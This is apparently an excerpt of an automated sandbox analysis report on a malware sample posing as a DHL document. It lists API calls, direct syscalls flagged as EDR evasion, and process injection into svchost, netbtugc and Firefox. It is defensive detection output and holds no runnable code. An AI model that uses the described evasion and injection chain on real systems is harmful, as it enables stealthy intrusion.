Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]	2_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]	2_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]	2_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]	2_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]	2_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]	2_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]	2_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]	2_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]	2_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]	2_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]	2_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]	2_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]	2_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]	2_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]	2_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]	2_2_03060854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]	2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]	2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]	2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]	2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]	2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]	2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]	2_2_03030887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]	2_2_030BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0305E8C0

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_00450B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00450B62

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00422622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00422622
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_0041083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041083F
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_004109D5 SetUnhandledExceptionFilter,	0_2_004109D5
Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Code function: 0_2_00410C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00410C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 7652

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 5D4008

Jump to behavior

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

0_2_00451201

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_00432BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00432BA5

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0045B226 SendInput,keybd_event,

0_2_0045B226

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_004722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_004722DA

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL-DOC83972025-1.exe"	Jump to behavior
Source: C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

0_2_00450B62

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_00451663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00451663

Source: DHL-DOC83972025-1.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DHL-DOC83972025-1.exe, CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000000.1326791670.00000000017E0000.00000002.00000001.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000002.3723888354.00000000017E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000000.1326791670.00000000017E0000.00000002.00000001.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000002.3723888354.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000000.1470403478.0000000000F91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000000.1326791670.00000000017E0000.00000002.00000001.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000002.3723888354.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000000.1470403478.0000000000F91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000000.1326791670.00000000017E0000.00000002.00000001.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 00000009.00000002.3723888354.00000000017E1000.00000002.00000001.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000000.1470403478.0000000000F91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_00410698 cpuid

0_2_00410698

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_00468195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00468195

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0044D27A GetUserNameW,

0_2_0044D27A

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

